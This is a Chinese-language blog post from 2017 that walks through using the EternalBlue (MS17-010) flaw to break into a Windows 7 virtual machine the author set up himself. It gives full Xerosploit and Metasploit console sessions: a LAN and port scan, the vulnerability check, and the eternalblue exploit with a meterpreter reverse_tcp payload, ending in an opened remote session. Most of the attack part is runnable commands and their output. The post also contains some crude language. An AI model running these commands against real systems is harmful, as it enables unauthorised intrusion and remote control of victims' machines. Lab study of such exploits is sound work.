首页 公告 项目 RSS

使用永恒之蓝(MS17-010)漏洞入侵windows7

July 2, 2017 本文有 4229 个字 需要花费 9 分钟阅读

永恒之蓝简介

前几天,被勒索病毒(Wannacry)刷屏了,这个病毒是大家知道了备份文件的重要性,当然,我是不怕什么病毒的,因为我是一天备份一次文件,而且微云一份,坚果云,移动硬盘一份,就算被黑了又能怎样,最多花个一天时间装个系统,配置一下系统。而且我是不用垃圾windows的,linux百毒不侵,而且我的系统是天天更新。所以说被黑了一半的原因在于自己真的没有意识,都2017年了,还把文件放在本地电脑硬盘上,什么心态。Mother Fuck
话题扯远了,wannacry是利用永恒之蓝漏洞做的,所以说你只要不开放局域网网络共享,也就是不开放445端口就没有你的什么事情了

顺便说一下wannacry的汉化,我操,真的是贴心,可以说是2017最佳汉化程序,如果做steam游戏的厂商用做病毒的心态去做,还怕我们中国玩家差评?不存在的

渗透测试环境搭建

首先安装一台虚拟x64的windows7然后按照下面一步一步打开网络共享
点击 文件管理器->网络然后


点击网络发现 和文件共享已关闭..........


点击启用网络共享


点击是


看到上面这样子,就是成功了
注意网络最好是桥接的
之后这台虚拟机就可以不用理它了,开着就好

开始入侵

首先更新一下metasploit
msfupdate
注意,最新版本的metasploit会提示
msfupdate is no longer supported when Metasploit is part of the operating system. Please use 'apt update; apt install metasploit-framework'
无所谓啦,你输入apt update && apt install metasploit-framework更新系统也没有事情的
之后扫描一下局域网内的机器
我喜欢用xerosploit扫描局域网,因为方便,如果不知道怎么安装和使用的同学,可以看我这篇博客
http://www.bboysoul.cn/2017/07/01/%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB%E5%B7%A5%E5%85%B7(Xerosploit)/
操作看下面

root@kali:~# xerosploit


██╗  ██╗███████╗██████╗  ██████╗ ███████╗██████╗ ██╗      ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
 ╚███╔╝ █████╗  ██████╔╝██║   ██║███████╗██████╔╝██║     ██║   ██║██║   ██║   
 ██╔██╗ ██╔══╝  ██╔══██╗██║   ██║╚════██║██╔═══╝ ██║     ██║   ██║██║   ██║   
██╔╝ ██╗███████╗██║  ██║╚██████╔╝███████║██║     ███████╗╚██████╔╝██║   ██║   
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝                                                      


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]
 
┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █ 
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘     
 
╒═══════════════╤═══════════════════╤═════════════╤═════════╤════════════╕
│  IP Address   │    MAC Address    │   Gateway   │  Iface  │  Hostname  │
╞═══════════════╪═══════════════════╪═════════════╪═════════╪════════════╡
│               │                   │             │         │            │
├───────────────┼───────────────────┼─────────────┼─────────┼────────────┤
│ 192.168.1.106 │ 08:00:27:7B:3D:E7 │ 192.168.1.1 │  eth0   │    kali    │
╘═══════════════╧═══════════════════╧═════════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ XeroSploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮ scan

[++] Mapping your network ... 

[+]═══════════[ Devices found on your network ]═══════════[+]

╔═══════════════╦═══════════════════╦════════════════════════════════╗
║ IP Address    ║ Mac Address       ║ Manufacturer                   ║
╠═══════════════╬═══════════════════╬════════════════════════════════╣
║ 192.168.1.1   ║ 6C:59:40:EB:2C:E4 ║ (Shenzhen MercuryCommunication ║
║ 192.168.1.100 ║ B8:27:EB:CE:05:C6 ║ (Raspberry PiFoundation)║ 192.168.1.105 ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology)║ 192.168.1.107 ║ 08:00:27:B3:74:87 ║ (Oracle VirtualBoxvirtual      ║
║ 192.168.1.106 ║ 08:00:27:7B:3D:E7 ║ (This device)║               ║                   ║                                ║
╚═══════════════╩═══════════════════╩════════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮ 192.168.1.107

[++] 192.168.1.107 has been targeted. 

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ pscan
 
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         Port Scanner                         █
█                                                              █
█      Find open ports on network computers and retrieve       █
█     versions of programs running on the detected ports       █
└══════════════════════════════════════════════════════════════┘     

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮ run

[++] Please wait ... Scanning ports on 192.168.1.107 

[+]═════════[ Port scan result for 192.168.1.107 ]═════════[+]

╔══════════════╦══════════╦═══════╗
║ SERVICE      ║ PORT     ║ STATE ║
╠══════════════╬══════════╬═══════╣
║ MSRPC        ║ 135/TCP  ║ OPEN  ║
║ NETBIOS-SSN  ║ 139/TCP  ║ OPEN  ║
║ MICROSOFT-DS ║ 445/TCP  ║ OPEN  ║
║ WSDAPI       ║ 5357/TCP ║ OPEN  ║
║              ║          ║       ║
╚══════════════╩══════════╩═══════╝

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮ 

首先看到局域网内有5台电脑,第一台是我的路由器,第二台是我的树莓派,第三台是我的主电脑,第四台是windows7虚拟机,第五台是我的kali虚拟的
扫描一下windows7虚拟机,确认445端口是开放的
然后打开meatsploit攻击,操作看下面

root@kali:~# msfconsole
                                                  

                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .


       =[ metasploit v4.14.27-dev                         ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search ms17-010
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                      Disclosure Date  Rank     Description
   ----                                      ---------------  ----     -----------
   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption


msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.107
rhosts => 192.168.1.107
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.1.107    yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > run

[+] 192.168.1.107:445     - Host is likely VULNERABLE to MS17-010!  (Windows 7 Ultimate 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(ms17_010_eternalblue) > set payload windows/x64/
set payload windows/x64/exec                            set payload windows/x64/meterpreter/reverse_winhttps    set payload windows/x64/vncinject/bind_ipv6_tcp
set payload windows/x64/loadlibrary                     set payload windows/x64/powershell_bind_tcp             set payload windows/x64/vncinject/bind_ipv6_tcp_uuid
set payload windows/x64/meterpreter/bind_ipv6_tcp       set payload windows/x64/powershell_reverse_tcp          set payload windows/x64/vncinject/bind_tcp
set payload windows/x64/meterpreter/bind_ipv6_tcp_uuid  set payload windows/x64/shell/bind_ipv6_tcp             set payload windows/x64/vncinject/bind_tcp_uuid
set payload windows/x64/meterpreter/bind_tcp            set payload windows/x64/shell/bind_ipv6_tcp_uuid        set payload windows/x64/vncinject/reverse_http
set payload windows/x64/meterpreter/bind_tcp_uuid       set payload windows/x64/shell/bind_tcp                  set payload windows/x64/vncinject/reverse_https
set payload windows/x64/meterpreter/reverse_http        set payload windows/x64/shell/bind_tcp_uuid             set payload windows/x64/vncinject/reverse_tcp
set payload windows/x64/meterpreter/reverse_https       set payload windows/x64/shell/reverse_tcp               set payload windows/x64/vncinject/reverse_tcp_uuid
set payload windows/x64/meterpreter/reverse_tcp         set payload windows/x64/shell/reverse_tcp_uuid          set payload windows/x64/vncinject/reverse_winhttp
set payload windows/x64/meterpreter/reverse_tcp_uuid    set payload windows/x64/shell_bind_tcp                  set payload windows/x64/vncinject/reverse_winhttps
set payload windows/x64/meterpreter/reverse_winhttp     set payload windows/x64/shell_reverse_tcp               
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.107    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.106  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::a00:27ff:fe7b:3de7  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:7b:3d:e7  txqueuelen 1000  (Ethernet)
        RX packets 4305  bytes 483899 (472.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11338  bytes 2843116 (2.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 8  bytes 396 (396.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8  bytes 396 (396.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.106
lhost => 192.168.1.106
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.107    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.106    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.106:4444 
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.107:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.107:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.1.107:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.1.107
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.107:49159) at 2017-07-02 04:15:38 -0400
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

首先我打开了metasploit,然后搜索了一下metasploit中和ms17-010相关的东西,发现有一个辅助模块和一个利用模块,然后我用辅助模块探测了我这台windows 7有没有ms17-010的漏洞,显示
[+] 192.168.1.107:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
表示目标系统有此漏洞,之后我用利用模块,然后再加载了一个后门载荷,设置了目标的ip和后门载荷所需要的本地ip之后执行exploit,成功拿到session

注意此攻击利用模块和后门载荷只对x64的系统有效。

Have fun